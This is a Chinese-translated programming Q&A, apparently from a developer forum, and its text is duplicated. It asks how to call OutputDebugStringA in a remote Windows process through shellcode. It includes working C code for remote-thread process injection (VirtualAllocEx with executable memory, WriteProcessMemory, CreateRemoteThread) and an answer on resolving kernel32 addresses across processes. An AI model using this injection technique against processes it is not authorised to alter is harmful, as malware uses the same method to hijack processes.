使用 shellcode 调用 windows API 函数
call windows API function using a shellcode
目标
我正在尝试一个简单的 shellcode 练习 - 使用将激活 shellcode 的 CreateRemoteThread 在远程进程上调用 "OutputDebugStringA" - 这个练习没有 dll 注入!
问题
我不知道 "OutputDebugStringA" 在远程进程的地址,只在本地进程。
到目前为止我一直在尝试什么
int main() {
char ShellCode[] = "\x48\x8d\x0c\x25\x10\x9c\x8c\x4c\xff\x14\x25\x00\x01\x8d\x4c";
/*
* Get process handle passing in the process ID.
*/
int32_t nProcID = 21440;
const HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, nProcID);
if (NULL == hProcess) {
printf("Error: the specified process couldn't be found.\n");
}
const LPVOID arg = (LPVOID)VirtualAllocEx(hProcess, NULL, sizeof(ShellCode), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (NULL == arg) {
int32_t nLastErrorCode = GetLastError();
printf("Error: the memory could not be allocated inside the chosen process. Error code - %d.\n", nLastErrorCode);
}
const int32_t nBytesWritten = WriteProcessMemory(hProcess, arg, ShellCode, sizeof(ShellCode), NULL);
if (0 == nBytesWritten) {
int32_t nLastErrorCode = GetLastError();
printf("Error: there was no bytes written to the process's address space. Error code - %d.\n", nLastErrorCode);
}
const HANDLE hThreadID = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)arg , NULL, NULL, NULL);
if (NULL == hThreadID) {
int32_t nLastErrorCode = GetLastError();
printf("Error: the remote thread could not be created. Error code - %d.\n", nLastErrorCode);
}
else {
printf("Success: the remote thread was successfully created.\n");
}
/*
* Close the handle to the process, because we've already injected the DLL.
*/
CloseHandle(hProcess);
getchar();
return 0;
}
我试过的
分解 OutputDebugStringA picture1
然后在线将其转换为shellcode,然后使用新的shellcode调用我的代码。但是远程进程不熟悉这些地址。
如果你只想知道OutputDebugStringA的地址(假设你的shellcode确实有效),它和当前进程是一样的。所以你可以通过LPVOID function_addr = reinterpret_cast<LPVOID>(GetProcAddress(GetModuleHandleA("kernel32.dll"), "OutputDebugStringA"));得到它然后你可以根据需要使用function_addr。
因为kernel32.dll在每个进程中都有相同的基地址,所以相对虚拟地址也相同,因此地址也相同。
目标 我正在尝试一个简单的 shellcode 练习 - 使用将激活 shellcode 的 CreateRemoteThread 在远程进程上调用 "OutputDebugStringA" - 这个练习没有 dll 注入!
问题 我不知道 "OutputDebugStringA" 在远程进程的地址,只在本地进程。
到目前为止我一直在尝试什么
int main() {
char ShellCode[] = "\x48\x8d\x0c\x25\x10\x9c\x8c\x4c\xff\x14\x25\x00\x01\x8d\x4c";
/*
* Get process handle passing in the process ID.
*/
int32_t nProcID = 21440;
const HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, nProcID);
if (NULL == hProcess) {
printf("Error: the specified process couldn't be found.\n");
}
const LPVOID arg = (LPVOID)VirtualAllocEx(hProcess, NULL, sizeof(ShellCode), MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (NULL == arg) {
int32_t nLastErrorCode = GetLastError();
printf("Error: the memory could not be allocated inside the chosen process. Error code - %d.\n", nLastErrorCode);
}
const int32_t nBytesWritten = WriteProcessMemory(hProcess, arg, ShellCode, sizeof(ShellCode), NULL);
if (0 == nBytesWritten) {
int32_t nLastErrorCode = GetLastError();
printf("Error: there was no bytes written to the process's address space. Error code - %d.\n", nLastErrorCode);
}
const HANDLE hThreadID = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)arg , NULL, NULL, NULL);
if (NULL == hThreadID) {
int32_t nLastErrorCode = GetLastError();
printf("Error: the remote thread could not be created. Error code - %d.\n", nLastErrorCode);
}
else {
printf("Success: the remote thread was successfully created.\n");
}
/*
* Close the handle to the process, because we've already injected the DLL.
*/
CloseHandle(hProcess);
getchar();
return 0;
}
我试过的 分解 OutputDebugStringA picture1 然后在线将其转换为shellcode,然后使用新的shellcode调用我的代码。但是远程进程不熟悉这些地址。
如果你只想知道OutputDebugStringA的地址(假设你的shellcode确实有效),它和当前进程是一样的。所以你可以通过LPVOID function_addr = reinterpret_cast<LPVOID>(GetProcAddress(GetModuleHandleA("kernel32.dll"), "OutputDebugStringA"));得到它然后你可以根据需要使用function_addr。
因为kernel32.dll在每个进程中都有相同的基地址,所以相对虚拟地址也相同,因此地址也相同。